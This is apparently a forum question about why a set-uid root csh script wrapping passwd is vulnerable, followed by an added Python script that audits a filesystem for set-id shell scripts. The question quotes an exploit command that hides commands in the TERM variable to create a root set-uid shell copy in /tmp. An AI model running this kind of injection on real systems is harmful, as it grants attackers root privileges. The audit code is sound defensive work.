In this article, it says that this C-shell script:
#!/bin/csh -b
set user = $1
passwd $user
With these permissions:
-rwsr-x--- 1 root helpdesk
Is vulnerable because one can manipulate env variables, like:
env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh`' change-pass
But I really don't see what the TERM env var has to do with all this. Do you have any explanation?
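An added example, not part of the original question or the article it cites: a Python audit that flags files of the kind shown above, meaning regular files with the set-uid or set-gid bit whose `#!` line names a shell. The `SHELLS` list, the function names and the sample input are assumptions constructed for illustration.

```python
import os
import stat
# Assumed list of shell interpreters worth flagging; extend for your systems.
SHELLS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh", "dash"}

def shebang_interpreter(head):
    """Return (interpreter basename, args) parsed from a file's first bytes, or None."""
    if not head.startswith(b"#!"):
        return None
    parts = head[2:].split(b"\n", 1)[0].decode("latin-1").split()
    if not parts:
        return None
    i = 0
    if os.path.basename(parts[0]) == "env":
        # "#!/usr/bin/env csh" hides the shell behind env: skip env's options/assignments.
        i = 1
        while i < len(parts) and (parts[i].startswith("-") or "=" in parts[i]):
            i += 1
        if i == len(parts):
            return None
    return os.path.basename(parts[i]), parts[i + 1:]

def classify(mode, head):
    """Describe a set-id shell script, or return None if the file is not one."""
    bits = [n for n, m in (("setuid", stat.S_ISUID), ("setgid", stat.S_ISGID)) if mode & m]
    interp = shebang_interpreter(head)
    if not bits or not stat.S_ISREG(mode) or interp is None or interp[0] not in SHELLS:
        return None
    return {"bits": bits, "interpreter": interp[0], "args": interp[1]}

def scan(root):
    """Walk root and yield (path, finding) for every set-id shell script found."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
                if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(256)
            except OSError:
                continue  # unreadable or vanished file: skip it
            finding = classify(mode, head)
            if finding:
                yield path, finding

if __name__ == "__main__":
    # Constructed sample: the mode (-rwsr-x---) and first lines from the question.
    print(classify(0o104750, b"#!/bin/csh -b\nset user = $1\n"))
```

Run `scan("/")` as root so unreadable directories are not silently skipped; each hit is a candidate for replacement with a compiled wrapper or a `sudo` rule.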